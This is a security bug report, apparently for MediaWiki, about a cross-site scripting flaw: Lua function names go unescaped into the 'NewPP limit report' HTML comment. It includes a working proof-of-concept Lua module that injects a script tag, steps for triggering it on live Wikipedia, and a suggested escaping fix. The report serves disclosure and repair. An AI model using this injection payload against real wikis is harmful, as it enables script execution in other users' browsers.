If over one second of CPU time is used in Lua, the Lua functions using the most CPU time will be reported in the "NewPP limit report" HTML comment. And Lua functions can be named pretty much anything. Which means that {{#invoke:Evil|hello}} with the following as Module:Evil will be bad:
local p = {}
function p.hello()
p['--><script>alert("uh oh")</script>']() for i = 0, 1e8 do end
end
p['--><script>alert("uh oh")</script>'] = function ()
for i = 0, 1e9 do end
end
return p
(adjust the 1e8 and 1e9 to suit the speed of whatever wiki you're testing it on). You can test this live, right now, by going to https://en.wikipedia.org/w/index.php?title=Module:Bananas&action=edit, pasting the above in, and entering "Template:Lua hello world" in the TemplateSandbox field.
It should be simple enough to fix; probably the best thing would be to escape $limitReport at includes/parser/Parser.php line 504. The question is what exactly needs to be escaped to make the "NewPP limit report" comment safe, and hopefully still leave it readable? Would something as simple as
str_replace( "--", "‐‐", $engine->getLimitReport() )
(that's U+2010) work?
Version: unspecified
Severity: critical